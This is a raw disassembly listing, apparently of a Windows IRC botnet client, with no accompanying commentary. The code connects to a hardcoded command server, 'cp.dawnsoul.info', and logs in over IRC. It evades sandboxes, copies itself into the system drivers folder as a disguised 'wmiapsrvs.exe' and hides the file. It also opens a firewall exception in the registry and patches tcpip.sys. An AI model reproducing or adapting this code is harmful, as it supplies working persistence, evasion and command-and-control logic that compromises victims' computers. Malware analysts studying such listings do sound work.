push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_A0]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_40D6BB
add esp, 14h
lea eax, [ebp+58h+var_A0]
push ebx
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+58h+var_A0]
push eax
push [ebp+58h+arg_0]
call dword_4C4724
cmp eax, 0FFFFFFFFh
jnz short loc_404843
push [ebp+58h+arg_0]
call dword_4C479C
push 1388h
call dword_419060 ; Sleep
xor eax, eax
jmp loc_4048FB
; ---------------------------------------------------------------------------
loc_404843: ; CODE XREF: sub_40479E+88�j
push esi
push edi
mov edi, 1000h
jmp short loc_4048C2
; ---------------------------------------------------------------------------
loc_40484C: ; CODE XREF: sub_40479E+149�j
lea eax, [ebp+58h+var_22C0]
push eax
lea eax, [ebp+58h+var_12C0]
push eax
call sub_408A1E
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_C], eax
mov [ebp+58h+var_4], ebx
jle short loc_4048C2
lea esi, [ebp+58h+var_22C0]
loc_404871: ; CODE XREF: sub_40479E+122�j
xor eax, eax
inc eax
loc_404874: ; CODE XREF: sub_40479E+105�j
push eax
lea eax, [ebp+58h+var_8]
push eax
lea eax, [ebp+58h+var_140]
push eax
lea eax, [ebp+58h+var_2C0]
push eax
push [ebp+58h+arg_18]
push [ebp+58h+arg_C]
push [ebp+58h+arg_8]
push [ebp+58h+arg_4]
push [ebp+58h+arg_0]
push dword ptr [esi]
call sub_40198E
add esp, 28h
dec eax
cmp eax, ebx
jg short loc_404874
cmp eax, 0FFFFFFFFh
jz short loc_4048ED
cmp eax, 0FFFFFFFEh
jz short loc_4048F1
cmp eax, 0FFFFFFFDh
jz short loc_4048F6
inc [ebp+58h+var_4]
mov eax, [ebp+58h+var_4]
add esi, 4
cmp eax, [ebp+58h+var_C]
jl short loc_404871
loc_4048C2: ; CODE XREF: sub_40479E+AC�j
; sub_40479E+CB�j
push edi
lea eax, [ebp+58h+var_12C0]
push ebx
push eax
call sub_40D7B0
add esp, 0Ch
push ebx
push edi
lea eax, [ebp+58h+var_12C0]
push eax
push [ebp+58h+arg_0]
call dword_4C45F4
test eax, eax
jg loc_40484C
loc_4048ED: ; CODE XREF: sub_40479E+10A�j
xor eax, eax
jmp short loc_4048F9
; ---------------------------------------------------------------------------
loc_4048F1: ; CODE XREF: sub_40479E+10F�j
xor eax, eax
inc eax
jmp short loc_4048F9
; ---------------------------------------------------------------------------
loc_4048F6: ; CODE XREF: sub_40479E+114�j
push 2
pop eax
loc_4048F9: ; CODE XREF: sub_40479E+151�j
; sub_40479E+156�j
pop edi
pop esi
loc_4048FB: ; CODE XREF: sub_40479E+A0�j
pop ebx
add ebp, 58h
leave
retn
sub_40479E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404901 proc near ; CODE XREF: sub_404BAB+554�p
var_4FC = byte ptr -4FCh
var_3F8 = byte ptr -3F8h
var_2F4 = byte ptr -2F4h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = byte ptr -2ACh
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_D8 = byte ptr -0D8h
var_98 = byte ptr -98h
var_58 = byte ptr -58h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_38 = byte ptr -38h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 4FCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_19C]
xor ebx, ebx
rep movsd
mov [ebp+var_4], ebx
mov dword ptr [eax+160h], 1
loc_40492C: ; CODE XREF: sub_404901+264�j
; sub_404901+27A�j ...
push 10h
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_40D7B0
add esp, 0Ch
push [ebp+var_11C]
mov [ebp+var_1C], 2
call dword_419234 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_19C]
push eax
call dword_419248 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jnz short loc_404975
lea eax, [ebp+var_19C]
push eax
call dword_419250 ; gethostbyname
jmp short loc_404983
; ---------------------------------------------------------------------------
loc_404975: ; CODE XREF: sub_404901+63�j
push 2
push 4
lea eax, [ebp+var_C]
push eax
call dword_41924C ; gethostbyaddr
loc_404983: ; CODE XREF: sub_404901+72�j
cmp eax, ebx
jz loc_404BA7
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
push 1Ch
mov [ebp+var_18], eax
lea eax, [ebp+var_38]
push ebx
push eax
call sub_40D7B0
add esp, 0Ch
push 6
push 1
push 2
call dword_419238 ; socket
mov esi, eax
mov eax, [ebp+var_40]
mov dword_4B85E8[eax*4], esi
push 10h
lea eax, [ebp+var_1C]
push eax
push esi
call dword_41923C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4049DF
push esi
call dword_419240 ; closesocket
push 7D0h
jmp loc_404B75
; ---------------------------------------------------------------------------
loc_4049DF: ; CODE XREF: sub_404901+CB�j
cmp [ebp+var_44], 1
jnz short loc_4049EA
lea eax, [ebp+var_58]
jmp short loc_404A05
; ---------------------------------------------------------------------------
loc_4049EA: ; CODE XREF: sub_404901+E2�j
xor eax, eax
mov al, byte_41E138
push ebx
push eax
push dword_41E140
lea eax, [ebp+var_38]
push eax
call sub_409C91
add esp, 10h
loc_404A05: ; CODE XREF: sub_404901+E7�j
mov [ebp+arg_0], eax
lea eax, [ebp+var_19C]
push eax
lea eax, [ebp+var_2F4]
push offset aConnectedToS_ ; "connected to %s."
push eax
call sub_40D6BB
lea eax, [ebp+var_2F4]
push eax
call sub_401648
mov eax, [ebp+var_40]
push 0Fh
push [ebp+arg_0]
shl eax, 4
add eax, offset byte_4B93D0
push eax
call sub_40DB80
add esp, 1Ch
cmp [ebp+var_44], 1
setz al
cmp dword_41E130, ebx
mov byte ptr [ebp+var_8], al
jz loc_404B2C
call sub_408E61
test eax, eax
jz loc_404B2C
push 104h
lea eax, [ebp+var_4FC]
push eax
call dword_4190B4 ; GetSystemDirectoryA
lea eax, [ebp+var_4FC]
push eax
lea eax, [ebp+var_3F8]
push offset aSDriversTcpip_ ; "%s\\drivers\\tcpip.sys"
push eax
call sub_40D6BB
lea eax, [ebp+var_3F8]
push eax
call sub_40AB64
mov edi, eax
add esp, 10h
cmp edi, ebx
jz loc_404B2C
push 104h
lea eax, [ebp+var_3F8]
push eax
lea eax, [ebp+var_2AC]
push eax
mov [ebp+var_2B4], esi
mov [ebp+var_1A4], ebx
call sub_40DB80
push ebx
push 8
push offset aTcpipPatcher ; "tcpip patcher!!"
mov [ebp+var_1A8], edi
call sub_40A83B
add esp, 18h
mov [ebp+var_2B0], eax
lea eax, [ebp+var_4]
push eax
push ebx
lea eax, [ebp+var_2B4]
push eax
push offset sub_408EF0
push ebx
push ebx
call dword_4190B0 ; CreateThread
mov ecx, [ebp+var_2B0]
imul ecx, 434h
cmp eax, ebx
mov dword_42221C[ecx], eax
jz short loc_404B2C
jmp short loc_404B24
; ---------------------------------------------------------------------------
loc_404B1C: ; CODE XREF: sub_404901+229�j
push 32h
call dword_419060 ; Sleep
loc_404B24: ; CODE XREF: sub_404901+219�j
cmp [ebp+var_1A0], ebx
jz short loc_404B1C
loc_404B2C: ; CODE XREF: sub_404901+154�j
; sub_404901+161�j ...
push [ebp+var_8]
lea eax, [ebp+var_19C]
push eax
lea eax, [ebp+var_98]
push eax
push [ebp+var_48]
lea eax, [ebp+var_D8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_118]
push eax
push esi
call sub_40479E
add esp, 20h
push esi
mov edi, eax
call dword_419240 ; closesocket
cmp edi, ebx
jz loc_40492C
cmp edi, 1
jnz short loc_404B80
push 1B7740h
loc_404B75: ; CODE XREF: sub_404901+D9�j
call dword_419060 ; Sleep
jmp loc_40492C
; ---------------------------------------------------------------------------
loc_404B80: ; CODE XREF: sub_404901+26D�j
cmp edi, 2
jnz loc_40492C
push [ebp+var_40]
call sub_40AADD
mov eax, [ebp+var_40]
pop ecx
shl eax, 4
push edi
mov byte_4B93D0[eax], bl
pop eax
loc_404BA0: ; CODE XREF: sub_404901+2A8�j
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_404BA7: ; CODE XREF: sub_404901+84�j
xor eax, eax
jmp short loc_404BA0
sub_404901 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404BAB proc near ; CODE XREF: .text:0040F9D5�p
var_DDC = byte ptr -0DDCh
var_CD8 = byte ptr -0CD8h
var_AD8 = byte ptr -0AD8h
var_AD7 = byte ptr -0AD7h
var_948 = byte ptr -948h
var_947 = byte ptr -947h
var_7B8 = byte ptr -7B8h
var_6B8 = byte ptr -6B8h
var_5B8 = byte ptr -5B8h
var_4B4 = byte ptr -4B4h
var_3B0 = byte ptr -3B0h
var_2B0 = byte ptr -2B0h
var_270 = byte ptr -270h
var_16C = byte ptr -16Ch
var_6C = dword ptr -6Ch
var_60 = dword ptr -60h
var_40 = dword ptr -40h
var_3C = word ptr -3Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0DDCh
push ebx
push esi
xor ebx, ebx
push edi
mov [ebp+var_8], ebx
call dword_4190A8 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_4B98DC, eax
call sub_407D3E
push 2
call dword_4190D4 ; SetErrorMode
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call dword_41920C ; InternetOpenA
cmp eax, ebx
mov dword_4BD8E0, eax
jnz short loc_404BFB
mov dword_4BD8E0, ebx
loc_404BFB: ; CODE XREF: sub_404BAB+48�j
mov edi, dword_419094
mov esi, 100h
push esi
lea eax, [ebp+var_16C]
push eax
push ebx
call edi ; GetModuleHandleA
push eax
call dword_419090 ; GetModuleFileNameA
push offset dword_421D00
push esi
call dword_4190A0 ; GetTempPathA
push 7530h
push offset aBawha ; "bawha"
push ebx
push ebx
call dword_419194 ; CreateMutexA
push eax
call dword_4190CC ; WaitForSingleObject
cmp eax, 102h
jnz short loc_404C4B
push 1
jmp loc_404F46
; ---------------------------------------------------------------------------
loc_404C4B: ; CODE XREF: sub_404BAB+97�j
lea eax, [ebp+var_948]
push eax
push 202h
call dword_4C46A0
test eax, eax
jnz loc_4051EF
cmp [ebp+var_948], 2
jnz loc_4051E9
cmp [ebp+var_947], 2
jnz loc_4051E9
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_2B0]
push eax
mov [ebp+var_14], 40h
call dword_419004 ; GetUserNameA
push offset aCurrentuser ; "CurrentUser"
lea eax, [ebp+var_2B0]
push eax
call dword_4190C8 ; lstrcmp
test eax, eax
jz loc_404F45
push 103h
lea eax, [ebp+var_4B4]
push eax
push ebx
call edi ; GetModuleHandleA
push eax
call dword_419090 ; GetModuleFileNameA
lea eax, [ebp+var_4B4]
push offset aInsidetm ; "InsideTm"
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz loc_404F45
push esi
lea eax, [ebp+var_3B0]
push eax
call dword_4190B4 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_16C]
push eax
push ebx
call edi ; GetModuleHandleA
push eax
call dword_419090 ; GetModuleFileNameA
lea eax, [ebp+var_6B8]
push eax
lea eax, [ebp+var_7B8]
push eax
push ebx
lea eax, [ebp+var_16C]
push ebx
push eax
call sub_40DEA4
lea eax, [ebp+var_6B8]
push eax
lea eax, [ebp+var_7B8]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+var_DDC]
push 104h
push eax
call sub_40DFEC
lea eax, [ebp+var_3B0]
push eax
lea eax, [ebp+var_16C]
push eax
call sub_40D810
mov edi, dword_419064
add esp, 30h
test eax, eax
jnz loc_404F4C
cmp dword_4BD8E4, ebx
mov esi, offset aWmiapsrvs_exe ; "wmiapsrvs.exe"
jz short loc_404DAB
push esi
mov [ebp+var_4], ebx
call sub_40D630
sub eax, 4
pop ecx
jz short loc_404DAB
loc_404D82: ; CODE XREF: sub_404BAB+1FE�j
call sub_40E04D
cdq
push 1Ah
pop ecx
idiv ecx
mov eax, [ebp+var_4]
push esi
add dl, 61h
inc [ebp+var_4]
mov byte ptr aWmiapsrvs_exe[eax], dl ; "wmiapsrvs.exe"
call sub_40D630
sub eax, 4
cmp [ebp+var_4], eax
pop ecx
jb short loc_404D82
loc_404DAB: ; CODE XREF: sub_404BAB+1C6�j
; sub_404BAB+1D5�j
push esi
lea eax, [ebp+var_3B0]
push eax
lea eax, [ebp+var_270]
push offset aSDriversS ; "%s\\drivers\\%s"
push eax
call sub_40D6BB
add esp, 10h
lea eax, [ebp+var_270]
push eax
call dword_4190C4 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_404DEB
push 80h
lea eax, [ebp+var_270]
push eax
call dword_419078 ; SetFileAttributesA
loc_404DEB: ; CODE XREF: sub_404BAB+22C�j
mov esi, dword_4190C0
mov [ebp+var_4], ebx
jmp short loc_404E1D
; ---------------------------------------------------------------------------
loc_404DF6: ; CODE XREF: sub_404BAB+285�j
call dword_4190AC ; RtlGetLastWin32Error
cmp [ebp+var_4], ebx
jnz short loc_404E32
cmp eax, 20h
jz short loc_404E0B
cmp eax, 5
jnz short loc_404E32
loc_404E0B: ; CODE XREF: sub_404BAB+259�j
push 3A98h
mov [ebp+var_4], 1
call dword_419060 ; Sleep
loc_404E1D: ; CODE XREF: sub_404BAB+249�j
push ebx
lea eax, [ebp+var_270]
push eax
lea eax, [ebp+var_16C]
push eax
call esi ; CopyFileA
test eax, eax
jz short loc_404DF6
loc_404E32: ; CODE XREF: sub_404BAB+254�j
; sub_404BAB+25E�j
lea eax, [ebp+var_270]
push eax
call sub_408AC2
pop ecx
push 7
lea eax, [ebp+var_270]
push eax
call dword_419078 ; SetFileAttributesA
cmp dword_4C5924, 2
jle short loc_404E96
mov eax, dword_4C5928
push dword ptr [eax+4]
call sub_40E0C8
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call dword_4190CC ; WaitForSingleObject
push esi
call edi ; CloseHandle
mov eax, dword_4C5928
cmp [eax+8], ebx
jz short loc_404E96
push 3E8h
call dword_419060 ; Sleep
mov eax, dword_4C5928
push dword ptr [eax+8]
call dword_41906C ; DeleteFileA
loc_404E96: ; CODE XREF: sub_404BAB+2AA�j
; sub_404BAB+2D0�j
push 10h
lea eax, [ebp+var_28]
push ebx
push eax
call sub_40D7B0
push 44h
pop esi
push esi
lea eax, [ebp+var_6C]
push ebx
push eax
call sub_40D7B0
mov [ebp+var_6C], esi
xor esi, esi
inc esi
add esp, 18h
mov [ebp+var_60], offset word_41994E
mov [ebp+var_40], esi
mov [ebp+var_3C], bx
call dword_4190BC ; GetCurrentProcessId
push eax
push esi
push 100000h
call dword_419074 ; OpenProcess
lea ecx, [ebp+var_16C]
push ecx
push eax
lea eax, [ebp+var_270]
push eax
lea eax, [ebp+var_5B8]
push offset aSDS ; "%s %d \"%s\""
push eax
call sub_40D6BB
add esp, 14h
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_3B0]
push eax
push ebx
push 28h
push esi
push ebx
push ebx
lea eax, [ebp+var_5B8]
push eax
lea eax, [ebp+var_270]
push eax
call dword_41909C ; CreateProcessA
test eax, eax
jz short loc_404F4C
push 0C8h
call dword_419060 ; Sleep
push [ebp+var_28]
call edi ; CloseHandle
push [ebp+var_24]
call edi ; CloseHandle
call dword_4C47A8
loc_404F45: ; CODE XREF: sub_404BAB+100�j
; sub_404BAB+131�j
push ebx
loc_404F46: ; CODE XREF: sub_404BAB+9B�j
call dword_4190B8 ; ExitProcess
loc_404F4C: ; CODE XREF: sub_404BAB+1B5�j
; sub_404BAB+37D�j
cmp dword_4C5924, 2
jle short loc_404F94
mov eax, dword_4C5928
push dword ptr [eax+4]
call sub_40E0C8
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call dword_4190CC ; WaitForSingleObject
push esi
call edi ; CloseHandle
mov eax, dword_4C5928
cmp [eax+8], ebx
jz short loc_404F94
push 7D0h
call dword_419060 ; Sleep
mov eax, dword_4C5928
push dword ptr [eax+8]
call dword_41906C ; DeleteFileA
loc_404F94: ; CODE XREF: sub_404BAB+3A8�j
; sub_404BAB+3CE�j
lea eax, [ebp+var_AD8]
push eax
push 101h
call dword_419230 ; WSAStartup
cmp eax, ebx
mov [ebp+var_C], eax
jnz loc_4051EF
cmp [ebp+var_AD8], 1
jnz loc_4051E1
cmp [ebp+var_AD7], 1
jnz loc_4051E1
push offset aWmiPerformance ; "WMI Performance Adapter Services"
lea eax, [ebp+var_16C]
push eax
lea eax, [ebp+var_CD8]
push offset aSEnabledS ; "%s:*:Enabled:%s"
push eax
call sub_40D6BB
add esp, 10h
push ebx
lea eax, [ebp+var_10]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
push 80000002h
call dword_419008 ; RegCreateKeyExA
lea eax, [ebp+var_CD8]
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_CD8]
push eax
push 1
push ebx
lea eax, [ebp+var_16C]
push eax
push [ebp+var_10]
call dword_41900C ; RegSetValueExA
push [ebp+var_10]
call dword_419014 ; RegCloseKey
cmp dword_41E134, ebx
jz short loc_40504F
lea eax, [ebp+var_16C]
push eax
call start
pop ecx
loc_40504F: ; CODE XREF: sub_404BAB+495�j
push 400h
push ebx
push offset byte_4B93D0
call sub_40D7B0
push 0B80h
push ebx
push offset dword_4B8850
call sub_40D7B0
push ebx
push ebx
mov esi, offset aShitStarted_ ; "Shit started."
push esi
call sub_40A83B
push 4000h
push ebx
push offset dword_4B98E0
call sub_40D7B0
push esi
call sub_401648
push 7Fh
push offset aCp_dawnsoul_in ; "cp.dawnsoul.info"
mov esi, offset dword_4B86E8
push esi
call sub_40DB80
mov eax, dword_41E16C
add esp, 40h
push 3Fh
push offset dword_41E17C
push offset dword_4B876C
mov dword_4B8768, eax
call sub_40DB80
push 3Fh
push offset aS_3 ; "s"
mov edi, offset dword_4B87AC
push edi
call sub_40DB80
add esp, 18h
mov dword_4B8840, ebx
loc_4050DD: ; CODE XREF: sub_404BAB+5C9�j
; sub_404BAB+5D4�j ...
mov [ebp+var_4], ebx
loc_4050E0: ; CODE XREF: sub_404BAB+57D�j
cmp dword_4B97D0, ebx
jnz short loc_4050FE
push ebx
lea eax, [ebp+var_18]
push eax
call dword_4C4608
test eax, eax
jnz short loc_4050FE
push 7530h
jmp short loc_40511B
; ---------------------------------------------------------------------------
loc_4050FE: ; CODE XREF: sub_404BAB+53B�j
; sub_404BAB+54A�j
push esi
call sub_404901
cmp eax, 2
mov [ebp+var_C], eax
mov dword_4BD8F0, ebx
jz loc_4051C9
push 0BB8h
loc_40511B: ; CODE XREF: sub_404BAB+551�j
call dword_419060 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_4050E0
cmp [ebp+var_C], 2
jz loc_4051C9
cmp [ebp+var_8], ebx
jz short loc_405179
push 7Fh
push offset aCp_dawnsoul_in ; "cp.dawnsoul.info"
push esi
call sub_40DB80
mov eax, dword_41E16C
push 3Fh
push offset dword_41E17C
push offset dword_4B876C
mov dword_4B8768, eax
call sub_40DB80
push 3Fh
push offset aS_3 ; "s"
push edi
call sub_40DB80
add esp, 24h
mov [ebp+var_8], ebx
jmp loc_4050DD
; ---------------------------------------------------------------------------
loc_405179: ; CODE XREF: sub_404BAB+58C�j
cmp byte_41E158, bl
jz loc_4050DD
push 7Fh
push offset byte_41E158
push esi
call sub_40DB80
mov eax, dword_41E170
push 3Fh
push offset dword_41E184
push offset dword_4B876C
mov dword_4B8768, eax
call sub_40DB80
push 3Fh
push offset aS_3 ; "s"
push edi
call sub_40DB80
add esp, 24h
mov [ebp+var_8], 1
jmp loc_4050DD
; ---------------------------------------------------------------------------
loc_4051C9: ; CODE XREF: sub_404BAB+565�j
; sub_404BAB+583�j
mov esi, offset dword_4B85E8
loc_4051CE: ; CODE XREF: sub_404BAB+634�j
push dword ptr [esi]
call dword_419240 ; closesocket
add esi, 4
cmp esi, offset dword_4B86E8
jl short loc_4051CE
loc_4051E1: ; CODE XREF: sub_404BAB+40D�j
; sub_404BAB+41A�j
call dword_419244 ; WSACleanup
jmp short loc_4051EF
; ---------------------------------------------------------------------------
loc_4051E9: ; CODE XREF: sub_404BAB+C1�j
; sub_404BAB+CE�j
call dword_4C47A8
loc_4051EF: ; CODE XREF: sub_404BAB+B4�j
; sub_404BAB+400�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_404BAB endp
; =============== S U B R O U T I N E =======================================
sub_4051F8 proc near ; CODE XREF: sub_4054AE+96�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
mov eax, offset dword_4C18F8
loc_405201: ; CODE XREF: sub_4051F8+18�j
mov edx, [ecx]
mov [eax], edx
add eax, 4
add ecx, 4
cmp eax, offset dword_4C1978
jb short loc_405201
retn
sub_4051F8 endp
; =============== S U B R O U T I N E =======================================
sub_405213 proc near ; CODE XREF: sub_40554F+B�p
movzx edx, byte ptr [ecx]
shl edx, 18h
mov [eax], edx
inc ecx
movzx edx, byte ptr [ecx]
shl edx, 10h
or [eax], edx
xor edx, edx
inc ecx
mov dh, [ecx]
or [eax], edx
inc ecx
movzx edx, byte ptr [ecx]
or [eax], edx
inc ecx
movzx edx, byte ptr [ecx]
shl edx, 18h
add eax, 4
mov [eax], edx
inc ecx
movzx edx, byte ptr [ecx]
shl edx, 10h
or [eax], edx
inc ecx
xor edx, edx
mov dh, [ecx]
or [eax], edx
movzx ecx, byte ptr [ecx+1]
mov edx, [eax]
or ecx, edx
mov [eax], ecx
retn
sub_405213 endp
; =============== S U B R O U T I N E =======================================
sub_405258 proc near ; CODE XREF: sub_40554F+26�p
mov dl, [ecx+3]
mov [eax], dl
mov dl, [ecx+2]
inc eax
mov [eax], dl
mov dl, [ecx+1]
inc eax
mov [eax], dl
mov dl, [ecx]
add ecx, 4
inc eax
mov [eax], dl
mov dl, [ecx+3]
inc eax
mov [eax], dl
mov dl, [ecx+2]
inc eax
mov [eax], dl
mov dl, [ecx+1]
inc eax
mov [eax], dl
mov cl, [ecx]
mov [eax+1], cl
retn
sub_405258 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405289 proc near ; CODE XREF: sub_40554F+19�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov edx, [eax]
mov ecx, [eax+4]
mov eax, edx
shr eax, 4
xor eax, ecx
and eax, 0F0F0F0Fh
xor ecx, eax
shl eax, 4
xor edx, eax
mov eax, edx
shr eax, 10h
xor eax, ecx
and eax, 0FFFFh
xor ecx, eax
shl eax, 10h
xor edx, eax
mov eax, ecx
shr eax, 2
xor eax, edx
and eax, 33333333h
xor edx, eax
shl eax, 2
xor ecx, eax
mov eax, ecx
shr eax, 8
xor eax, edx
and eax, 0FF00FFh
xor edx, eax
shl eax, 8
xor ecx, eax
mov eax, ecx
add ecx, ecx
shr eax, 1Fh
or eax, ecx
mov ecx, eax
xor ecx, edx
and ecx, 0AAAAAAAAh
xor edx, ecx
xor eax, ecx
mov ecx, edx
push ebx
shr ecx, 1Fh
add edx, edx
push esi
or ecx, edx
mov [ebp+var_4], 8
push edi
loc_40530B: ; CODE XREF: sub_405289+1A5�j
mov edi, [ebp+arg_4]
mov esi, eax
shl esi, 1Ch
mov edx, eax
shr edx, 4
or esi, edx
xor esi, [edi]
add edi, 4
mov edx, esi
shr edx, 18h
mov ebx, esi
shr ebx, 10h
and ebx, 3Fh
and edx, 3Fh
mov edx, dword_41E428[edx*4]
or edx, dword_41E628[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
or edx, dword_41E828[ebx*4]
and esi, 3Fh
or edx, dword_41EA28[esi*4]
mov esi, [edi]
add edi, 4
mov [ebp+arg_4], edi
xor esi, eax
mov edi, esi
shr edi, 18h
and edi, 3Fh
mov edi, dword_41E528[edi*4]
mov ebx, esi
shr ebx, 10h
and ebx, 3Fh
or edi, dword_41E728[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
or edi, dword_41E928[ebx*4]
and esi, 3Fh
or edi, dword_41EB28[esi*4]
or edi, edx
xor ecx, edi
mov edi, [ebp+arg_4]
mov esi, ecx
shl esi, 1Ch
mov edx, ecx
shr edx, 4
or esi, edx
xor esi, [edi]
add edi, 4
mov edx, esi
shr edx, 18h
mov ebx, esi
shr ebx, 10h
and ebx, 3Fh
and edx, 3Fh
mov edx, dword_41E428[edx*4]
or edx, dword_41E628[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
or edx, dword_41E828[ebx*4]
and esi, 3Fh
or edx, dword_41EA28[esi*4]
mov esi, [edi]
add edi, 4
mov [ebp+arg_4], edi
xor esi, ecx
mov edi, esi
shr edi, 18h
and edi, 3Fh
mov edi, dword_41E528[edi*4]
mov ebx, esi
shr ebx, 10h
and ebx, 3Fh
or edi, dword_41E728[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
or edi, dword_41E928[ebx*4]
and esi, 3Fh
or edi, dword_41EB28[esi*4]
or edi, edx
xor eax, edi
dec [ebp+var_4]
jnz loc_40530B
mov edx, eax
shr eax, 1
shl edx, 1Fh
or edx, eax
mov eax, edx
xor eax, ecx
and eax, 0AAAAAAAAh
xor ecx, eax
xor edx, eax
mov esi, ecx
shl esi, 1Fh
shr ecx, 1
or esi, ecx
mov eax, esi
shr eax, 8
xor eax, edx
and eax, 0FF00FFh
xor edx, eax
shl eax, 8
xor esi, eax
mov eax, esi
shr eax, 2
xor eax, edx
and eax, 33333333h
xor edx, eax
shl eax, 2
xor esi, eax
mov ecx, [ebp+arg_0]
mov eax, edx
shr eax, 10h
xor eax, esi
and eax, 0FFFFh
xor esi, eax
shl eax, 10h
xor edx, eax
mov eax, edx
shr eax, 4
xor eax, esi
and eax, 0F0F0F0Fh
mov edi, eax
shl edi, 4
xor edi, edx
mov [ecx], edi
pop edi
xor eax, esi
pop esi
mov [ecx+4], eax
pop ebx
leave
retn
sub_405289 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4054AE proc near ; CODE XREF: sub_40557C+FB�p
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push ebx
push esi
lea edx, [ebp+var_84]
mov [ebp+var_4], 10h
push edi
loc_4054C7: ; CODE XREF: sub_4054AE+8D�j
mov eax, [ebp+arg_0]
mov eax, [eax]
add [ebp+arg_0], 4
mov ecx, [ebp+arg_0]
mov ecx, [ecx]
mov esi, eax
and esi, 0FC0h
shl esi, 4
mov edi, eax
and edi, 0FC0000h
or esi, edi
mov edi, ecx
shr edi, 4
add [ebp+arg_0], 4
shl esi, 6
mov ebx, ecx
and edi, 0FC000h
and ebx, 0FC0h
or edi, ebx
shr edi, 6
or esi, edi
mov [edx], esi
mov esi, eax
and esi, 3Fh
shl esi, 4
and eax, 3F000h
or esi, eax
mov eax, ecx
shr eax, 4
shl esi, 0Ch
and eax, 3F00h
or esi, eax
and ecx, 3Fh
add edx, 4
or esi, ecx
mov [edx], esi
add edx, 4
dec [ebp+var_4]
jnz short loc_4054C7
lea eax, [ebp+var_84]
push eax
call sub_4051F8
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4054AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40554F proc near ; CODE XREF: sub_40CC0B+49�p
; sub_40CC65+40�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
lea eax, [ebp+var_8]
call sub_405213
lea eax, [ebp+var_8]
push offset dword_4C18F8
push eax
call sub_405289
mov eax, [ebp+arg_4]
pop ecx
pop ecx
lea ecx, [ebp+var_8]
call sub_405258
leave
retn
sub_40554F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_40557C proc near ; CODE XREF: sub_40CC0B+3A�p
; sub_40CC65+35�p
var_F8 = byte ptr -0F8h
var_F4 = byte ptr -0F4h
var_94 = byte ptr -94h
var_78 = byte ptr -78h
var_40 = byte ptr -40h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 0F8h
push ebx
push esi
xor ebx, ebx
push edi
xor ecx, ecx
loc_40558E: ; CODE XREF: sub_40557C+39�j
movzx eax, byte_41E3B0[ecx]
mov esi, [ebp+70h+arg_0]
mov edx, eax
sar edx, 3
mov dl, [edx+esi]
and eax, 7
test byte_41E340[eax*2], dl
setnz al
mov [ebp+ecx+70h+var_78], al
inc ecx
cmp ecx, 38h
jl short loc_40558E
mov [ebp+70h+var_4], ebx
